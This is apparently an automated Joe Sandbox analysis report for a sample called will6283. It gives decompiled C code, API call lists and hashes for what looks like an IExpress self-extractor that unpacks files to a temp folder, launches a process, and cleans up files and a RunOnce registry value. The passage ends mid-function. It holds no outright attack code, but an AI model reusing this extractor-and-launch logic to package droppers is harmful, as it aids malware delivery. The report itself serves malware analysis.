                                                0x01066be1
                                                0x01066be3
                                                0x01066be5
                                                0x01066be5
                                                0x01066be6
                                                0x01066be6
                                                0x01066be9
                                                0x01066bea
                                                0x01066bea
                                                0x01066b74
                                                0x01066c39
                                                0x01066c3e
                                                0x01066c3e
                                                0x01066abe
                                                0x01066abe
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 01067155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01067182
                                                  • Part of subcall function 01067155: GetCurrentProcessId.KERNEL32 ref: 01067191
                                                  • Part of subcall function 01067155: GetCurrentThreadId.KERNEL32 ref: 0106719A
                                                  • Part of subcall function 01067155: GetTickCount.KERNEL32 ref: 010671A3
                                                  • Part of subcall function 01067155: QueryPerformanceCounter.KERNEL32(?), ref: 010671B8
                                                • GetStartupInfoW.KERNEL32(?,010672B8,00000058), ref: 01066A7F
                                                • Sleep.KERNEL32(000003E8), ref: 01066AB4
                                                • _amsg_exit.MSVCRT ref: 01066AC9
                                                • _initterm.MSVCRT ref: 01066B1D
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 01066B49
                                                • exit.KERNELBASE ref: 01066BBF
                                                • _ismbblead.MSVCRT ref: 01066BDA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                • String ID:
                                                • API String ID: 836923961-0
                                                • Opcode ID: 177c16f59217cd33e1ee1bb9d1cb0a2e4eaa71ec13c870ffab8aeb33213cce81
                                                • Instruction ID: 5637309764d9197c7cece6129c81dfd4ed01299a941e65e4e843cc35efbf1c00
                                                • Opcode Fuzzy Hash: 177c16f59217cd33e1ee1bb9d1cb0a2e4eaa71ec13c870ffab8aeb33213cce81
                                                • Instruction Fuzzy Hash: 7B41E730A44326DFEB719B6DD9047AE7BECFB84720F14515AE9C1A7294CB7B48808B80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 631 10658c8-10658d5 632 10658d8-10658dd 631->632 632->632 633 10658df-10658f1 LocalAlloc 632->633 634 10658f3-1065901 call 10644b9 633->634 635 1065919-1065959 call 1061680 call 106658a CreateFileA LocalFree 633->635 638 1065906-1065910 call 1066285 634->638 635->638 645 106595b-106596c CloseHandle GetFileAttributesA 635->645 644 1065912-1065918 638->644 645->638 646 106596e-1065970 645->646 646->638 647 1065972-106597b 646->647 647->644
                                                C-Code - Quality: 95%
                                                			E010658C8(intOrPtr* __ecx) {
                                                				void* _v8;
                                                				intOrPtr _t6;
                                                				void* _t10;
                                                				void* _t12;
                                                				void* _t14;
                                                				signed char _t16;
                                                				void* _t20;
                                                				void* _t23;
                                                				intOrPtr* _t27;
                                                				CHAR* _t33;
                                                
                                                				_push(__ecx);
                                                				_t33 = __ecx;
                                                				_t27 = __ecx;
                                                				_t23 = __ecx + 1;
                                                				do {
                                                					_t6 =  *_t27;
                                                					_t27 = _t27 + 1;
                                                				} while (_t6 != 0);
                                                				_t36 = _t27 - _t23 + 0x14;
                                                				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                				if(_t20 != 0) {
                                                					E01061680(_t20, _t36, _t33);
                                                					E0106658A(_t20, _t36, "TMP4351$.TMP");
                                                					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                					_v8 = _t10;
                                                					LocalFree(_t20);
                                                					_t12 = _v8;
                                                					if(_t12 == 0xffffffff) {
                                                						goto L4;
                                                					} else {
                                                						CloseHandle(_t12);
                                                						_t16 = GetFileAttributesA(_t33); // executed
                                                						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                							goto L4;
                                                						} else {
                                                							 *0x1069124 = 0;
                                                							_t14 = 1;
                                                						}
                                                					}
                                                				} else {
                                                					E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					L4:
                                                					 *0x1069124 = E01066285();
                                                					_t14 = 0;
                                                				}
                                                				return _t14;
                                                			}













                                                0x010658cd
                                                0x010658d1
                                                0x010658d3
                                                0x010658d5
                                                0x010658d8
                                                0x010658d8
                                                0x010658da
                                                0x010658db
                                                0x010658e1
                                                0x010658ed
                                                0x010658f1
                                                0x0106591e
                                                0x0106592c
                                                0x01065943
                                                0x0106594a
                                                0x0106594d
                                                0x01065953
                                                0x01065959
                                                0x00000000
                                                0x0106595b
                                                0x0106595c
                                                0x01065963
                                                0x0106596c
                                                0x00000000
                                                0x01065972
                                                0x01065974
                                                0x0106597a
                                                0x0106597a
                                                0x0106596c
                                                0x010658f3
                                                0x01065901
                                                0x01065906
                                                0x0106590b
                                                0x01065910
                                                0x01065910
                                                0x01065918

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010658E7
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065943
                                                • LocalFree.KERNEL32(00000000,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106594D
                                                • CloseHandle.KERNEL32(00000000,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106595C
                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065963
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                • API String ID: 747627703-1860564779
                                                • Opcode ID: 87e1ddeb5dc502afa59fc95db9022f86a6c1ce2ebfb9fcfbf9209f708ee4dc03
                                                • Instruction ID: c228e05cd931303c89104d3bc11926621bb237a8ab939e1f2f7990b0ece97516
                                                • Opcode Fuzzy Hash: 87e1ddeb5dc502afa59fc95db9022f86a6c1ce2ebfb9fcfbf9209f708ee4dc03
                                                • Instruction Fuzzy Hash: 04113871700221ABD7302E7D5C0CA9B7E9DDF862A0B100659F6C6E71C4CE769845C3B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 675 1063fef-1064010 676 1064016-106403b CreateProcessA 675->676 677 106410a-106411a call 1066ce0 675->677 678 10640c4-1064101 call 1066285 GetLastError FormatMessageA call 10644b9 676->678 679 1064041-106406e WaitForSingleObject GetExitCodeProcess 676->679 691 1064106 678->691 682 1064070-1064077 679->682 683 1064091 call 106411b 679->683 682->683 686 1064079-106407b 682->686 690 1064096-10640b8 CloseHandle * 2 683->690 686->683 689 106407d-1064089 686->689 689->683 692 106408b 689->692 693 10640ba-10640c0 690->693 694 1064108 690->694 691->694 692->683 693->694 695 10640c2 693->695 694->677 695->691
                                                C-Code - Quality: 84%
                                                			E01063FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                				signed int _v8;
                                                				char _v524;
                                                				long _v528;
                                                				struct _PROCESS_INFORMATION _v544;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t20;
                                                				void* _t22;
                                                				int _t25;
                                                				intOrPtr* _t39;
                                                				signed int _t44;
                                                				void* _t49;
                                                				signed int _t50;
                                                				intOrPtr _t53;
                                                
                                                				_t45 = __edx;
                                                				_t20 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t20 ^ _t50;
                                                				_t39 = __ecx;
                                                				_t49 = 1;
                                                				_t22 = 0;
                                                				if(__ecx == 0) {
                                                					L13:
                                                					return E01066CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                				}
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                				if(_t25 == 0) {
                                                					 *0x1069124 = E01066285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                					_t45 = 0x4c4;
                                                					E010644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                					L11:
                                                					_t49 = 0;
                                                					L12:
                                                					_t22 = _t49;
                                                					goto L13;
                                                				}
                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                				_t44 = _v528;
                                                				_t53 =  *0x1068a28; // 0x0
                                                				if(_t53 == 0) {
                                                					_t34 =  *0x1069a2c; // 0x0
                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                						_t34 = _t44 & 0xff000000;
                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                							 *0x1069a2c = _t44;
                                                						}
                                                					}
                                                				}
                                                				E0106411B(_t34, _t44);
                                                				CloseHandle(_v544.hThread);
                                                				CloseHandle(_v544);
                                                				if(( *0x1069a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                					goto L12;
                                                				} else {
                                                					goto L11;
                                                				}
                                                			}


















                                                0x01063fef
                                                0x01063ffa
                                                0x01064001
                                                0x01064008
                                                0x0106400a
                                                0x0106400b
                                                0x01064010
                                                0x0106410a
                                                0x0106411a
                                                0x0106411a
                                                0x0106401c
                                                0x0106401d
                                                0x0106401e
                                                0x0106401f
                                                0x01064033
                                                0x0106403b
                                                0x010640ca
                                                0x010640e9
                                                0x010640f8
                                                0x01064101
                                                0x01064106
                                                0x01064106
                                                0x01064108
                                                0x01064108
                                                0x00000000
                                                0x01064108
                                                0x01064049
                                                0x0106405c
                                                0x01064062
                                                0x01064068
                                                0x0106406e
                                                0x01064070
                                                0x01064077
                                                0x0106407f
                                                0x01064089
                                                0x0106408b
                                                0x0106408b
                                                0x01064089
                                                0x01064077
                                                0x01064091
                                                0x0106409c
                                                0x010640a8
                                                0x010640b8
                                                0x00000000
                                                0x010640c2
                                                0x00000000
                                                0x010640c2

                                                APIs
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 01064033
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01064049
                                                • GetExitCodeProcess.KERNELBASE ref: 0106405C
                                                • CloseHandle.KERNEL32(?), ref: 0106409C
                                                • CloseHandle.KERNEL32(?), ref: 010640A8
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010640DC
                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 010640E9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                • String ID:
                                                • API String ID: 3183975587-0
                                                • Opcode ID: a121573a7f80e16aea712e0b3cc8d336b836e8bf9ef53cad23e9c8cbbb1a1c1b
                                                • Instruction ID: 7ced793cae422cd009109884f7157973f0f062fdd4dbe45f680afa01934c2a64
                                                • Opcode Fuzzy Hash: a121573a7f80e16aea712e0b3cc8d336b836e8bf9ef53cad23e9c8cbbb1a1c1b
                                                • Instruction Fuzzy Hash: 2631C231740218EBFB709B65DC48FAB7BBCEB94700F1001A9F585E6165CA364D81CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E010651E5(void* __eflags) {
                                                				int _t5;
                                                				void* _t6;
                                                				void* _t28;
                                                
                                                				_t1 = E0106468F("UPROMPT", 0, 0) + 1; // 0x1
                                                				_t28 = LocalAlloc(0x40, _t1);
                                                				if(_t28 != 0) {
                                                					if(E0106468F("UPROMPT", _t28, _t29) != 0) {
                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                						if(_t5 != 0) {
                                                							_t6 = E010644B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                							LocalFree(_t28);
                                                							if(_t6 != 6) {
                                                								 *0x1069124 = 0x800704c7;
                                                								L10:
                                                								return 0;
                                                							}
                                                							 *0x1069124 = 0;
                                                							L6:
                                                							return 1;
                                                						}
                                                						LocalFree(_t28);
                                                						goto L6;
                                                					}
                                                					E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree(_t28);
                                                					 *0x1069124 = 0x80070714;
                                                					goto L10;
                                                				}
                                                				E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0x1069124 = E01066285();
                                                				goto L10;
                                                			}






                                                0x010651fb
                                                0x01065207
                                                0x0106520b
                                                0x0106523c
                                                0x01065268
                                                0x01065270
                                                0x0106528b
                                                0x01065293
                                                0x0106529c
                                                0x010652a6
                                                0x010652b0
                                                0x00000000
                                                0x010652b0
                                                0x0106529e
                                                0x01065279
                                                0x00000000
                                                0x0106527b
                                                0x01065273
                                                0x00000000
                                                0x01065273
                                                0x0106524a
                                                0x01065250
                                                0x01065256
                                                0x00000000
                                                0x01065256
                                                0x01065219
                                                0x01065223
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                  • Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                  • Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                  • Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                  • Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
                                                  • Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01062F4D,?,00000002,00000000), ref: 01065201
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01065250
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                  • Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$UPROMPT
                                                • API String ID: 957408736-2980973527
                                                • Opcode ID: 217d7c1ccaeef3f73dd77ecdeffe7151ccea73c98c85314bf5368893e31c3c0f
                                                • Instruction ID: c3eef330bfed22f1362ab595fc532fda83a1fd9143d4706d1fca39b9526f6728
                                                • Opcode Fuzzy Hash: 217d7c1ccaeef3f73dd77ecdeffe7151ccea73c98c85314bf5368893e31c3c0f
                                                • Instruction Fuzzy Hash: 5B1190B1700202FFE3656B755D49B7B619EEBD9384B10442DF6C2EA194DA7E8C014224
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E010652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t9;
                                                				signed int _t11;
                                                				void* _t21;
                                                				void* _t29;
                                                				CHAR** _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
                                                				_t28 = __edi;
                                                				_t22 = __ecx;
                                                				_t21 = __ebx;
                                                				_t9 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t9 ^ _t33;
                                                				_push(__esi);
                                                				_t31 =  *0x10691e0; // 0xf37c00
                                                				if(_t31 != 0) {
                                                					_push(__edi);
                                                					do {
                                                						_t29 = _t31;
                                                						if( *0x1068a24 == 0 &&  *0x1069a30 == 0) {
                                                							SetFileAttributesA( *_t31, 0x80); // executed
                                                							DeleteFileA( *_t31); // executed
                                                						}
                                                						_t31 = _t31[1];
                                                						LocalFree( *_t29);
                                                						LocalFree(_t29);
                                                					} while (_t31 != 0);
                                                					_pop(_t28);
                                                				}
                                                				_t11 =  *0x1068a20; // 0x0
                                                				_pop(_t32);
                                                				if(_t11 != 0 &&  *0x1068a24 == 0 &&  *0x1069a30 == 0) {
                                                					_push(_t22);
                                                					E01061781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                					if(( *0x1069a34 & 0x00000020) != 0) {
                                                						E010665E8( &_v268);
                                                					}
                                                					SetCurrentDirectoryA(".."); // executed
                                                					_t22 =  &_v268;
                                                					E01062390( &_v268);
                                                					_t11 =  *0x1068a20; // 0x0
                                                				}
                                                				if( *0x1069a40 != 1 && _t11 != 0) {
                                                					_t11 = E01061FE1(_t22); // executed
                                                				}
                                                				 *0x1068a20 =  *0x1068a20 & 0x00000000;
                                                				return E01066CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                			}












                                                0x010652b6
                                                0x010652b6
                                                0x010652b6
                                                0x010652c1
                                                0x010652c8
                                                0x010652cb
                                                0x010652cc
                                                0x010652d4
                                                0x010652d6
                                                0x010652d7
                                                0x010652de
                                                0x010652e0
                                                0x010652f2
                                                0x010652fa
                                                0x010652fa
                                                0x01065302
                                                0x01065305
                                                0x0106530c
                                                0x01065312
                                                0x01065316
                                                0x01065316
                                                0x01065317
                                                0x0106531c
                                                0x0106531f
                                                0x01065333
                                                0x01065345
                                                0x01065351
                                                0x01065359
                                                0x01065359
                                                0x01065363
                                                0x01065369
                                                0x0106536f
                                                0x01065374
                                                0x01065374
                                                0x01065381
                                                0x01065387
                                                0x01065387
                                                0x0106538f
                                                0x010653a0

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(00F37C00,00000080,?,00000000), ref: 010652F2
                                                • DeleteFileA.KERNELBASE(00F37C00), ref: 010652FA
                                                • LocalFree.KERNEL32(00F37C00,?,00000000), ref: 01065305
                                                • LocalFree.KERNEL32(00F37C00), ref: 0106530C
                                                • SetCurrentDirectoryA.KERNELBASE(010611FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 01065363
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01065334
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                • API String ID: 2833751637-2356899610
                                                • Opcode ID: f11dccf7f03e279170e600e7c515ac2ca5a90831866e2727d404a0e1af32ad51
                                                • Instruction ID: fb9863f35e18d11471cc5570666c61d113b4ab6c4c93e276ffa21341bf016ae5
                                                • Opcode Fuzzy Hash: f11dccf7f03e279170e600e7c515ac2ca5a90831866e2727d404a0e1af32ad51
                                                • Instruction Fuzzy Hash: 4121C331900324DFEB71AF14DC18BAD77F8BB14B54F048199F9C2A75A8CBBA5984CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01061FE1(void* __ecx) {
                                                				void* _v8;
                                                				long _t4;
                                                
                                                				if( *0x1068530 != 0) {
                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                					if(_t4 == 0) {
                                                						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                						return RegCloseKey(_v8);
                                                					}
                                                				}
                                                				return _t4;
                                                			}





                                                0x01061fee
                                                0x01062005
                                                0x0106200d
                                                0x01062017
                                                0x00000000
                                                0x01062020
                                                0x0106200d
                                                0x01062029

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0106538C,?,?,0106538C), ref: 01062005
                                                • RegDeleteValueA.KERNELBASE(0106538C,wextract_cleanup1,?,?,0106538C), ref: 01062017
                                                • RegCloseKey.ADVAPI32(0106538C,?,?,0106538C), ref: 01062020
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                • API String ID: 849931509-1592051331
                                                • Opcode ID: e80a688f53287ff99bb07da455a43da5baed72fc294026db9567b33f8af79e5a
                                                • Instruction ID: b516f8180392fb4612b31329688f48734ec81bfb7add6c66cdcf8b9c471e95b1
                                                • Opcode Fuzzy Hash: e80a688f53287ff99bb07da455a43da5baed72fc294026db9567b33f8af79e5a
                                                • Instruction Fuzzy Hash: C2E04F30655319FBFB319A91EC0EF597B6EE700780F10019AFA84B1065E7665A10D704
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E01064CD0(char* __edx, long _a4, int _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				int _t30;
                                                				long _t32;
                                                				signed int _t33;
                                                				long _t35;
                                                				long _t36;
                                                				struct HWND__* _t37;
                                                				long _t38;
                                                				long _t39;
                                                				long _t41;
                                                				long _t44;
                                                				long _t45;
                                                				long _t46;
                                                				signed int _t50;
                                                				long _t51;
                                                				char* _t58;
                                                				long _t59;
                                                				char* _t63;
                                                				long _t64;
                                                				CHAR* _t71;
                                                				CHAR* _t74;
                                                				int _t75;
                                                				signed int _t76;
                                                
                                                				_t69 = __edx;
                                                				_t29 =  *0x1068004; // 0x19e58fb5
                                                				_t30 = _t29 ^ _t76;
                                                				_v8 = _t30;
                                                				_t75 = _a8;
                                                				if( *0x10691d8 == 0) {
                                                					_t32 = _a4;
                                                					__eflags = _t32;
                                                					if(_t32 == 0) {
                                                						_t33 = E01064E99(_t75);
                                                						L35:
                                                						return E01066CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                					}
                                                					_t35 = _t32 - 1;
                                                					__eflags = _t35;
                                                					if(_t35 == 0) {
                                                						L9:
                                                						_t33 = 0;
                                                						goto L35;
                                                					}
                                                					_t36 = _t35 - 1;
                                                					__eflags = _t36;
                                                					if(_t36 == 0) {
                                                						_t37 =  *0x1068584; // 0x0
                                                						__eflags = _t37;
                                                						if(_t37 != 0) {
                                                							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                						}
                                                						_t54 = 0x10691e4;
                                                						_t58 = 0x10691e4;
                                                						do {
                                                							_t38 =  *_t58;
                                                							_t58 =  &(_t58[1]);
                                                							__eflags = _t38;
                                                						} while (_t38 != 0);
                                                						_t59 = _t58 - 0x10691e5;
                                                						__eflags = _t59;
                                                						_t71 =  *(_t75 + 4);
                                                						_t73 =  &(_t71[1]);
                                                						do {
                                                							_t39 =  *_t71;
                                                							_t71 =  &(_t71[1]);
                                                							__eflags = _t39;
                                                						} while (_t39 != 0);
                                                						_t69 = _t71 - _t73;
                                                						_t30 = _t59 + 1 + _t71 - _t73;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							L3:
                                                							_t33 = _t30 | 0xffffffff;
                                                							goto L35;
                                                						}
                                                						_t69 = 0x10691e4;
                                                						_t30 = E01064702( &_v268, 0x10691e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(__eflags == 0) {
                                                							goto L3;
                                                						}
                                                						_t41 = E0106476D( &_v268, __eflags);
                                                						__eflags = _t41;
                                                						if(_t41 == 0) {
                                                							goto L9;
                                                						}
                                                						_push(0x180);
                                                						_t30 = E01064980( &_v268, 0x8302); // executed
                                                						_t75 = _t30;
                                                						__eflags = _t75 - 0xffffffff;
                                                						if(_t75 == 0xffffffff) {
                                                							goto L3;
                                                						}
                                                						_t30 = E010647E0( &_v268);
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						 *0x10693f4 =  *0x10693f4 + 1;
                                                						_t33 = _t75;
                                                						goto L35;
                                                					}
                                                					_t44 = _t36 - 1;
                                                					__eflags = _t44;
                                                					if(_t44 == 0) {
                                                						_t54 = 0x10691e4;
                                                						_t63 = 0x10691e4;
                                                						do {
                                                							_t45 =  *_t63;
                                                							_t63 =  &(_t63[1]);
                                                							__eflags = _t45;
                                                						} while (_t45 != 0);
                                                						_t74 =  *(_t75 + 4);
                                                						_t64 = _t63 - 0x10691e5;
                                                						__eflags = _t64;
                                                						_t69 =  &(_t74[1]);
                                                						do {
                                                							_t46 =  *_t74;
                                                							_t74 =  &(_t74[1]);
                                                							__eflags = _t46;
                                                						} while (_t46 != 0);
                                                						_t73 = _t74 - _t69;
                                                						_t30 = _t64 + 1 + _t74 - _t69;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							goto L3;
                                                						}
                                                						_t69 = 0x10691e4;
                                                						_t30 = E01064702( &_v268, 0x10691e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
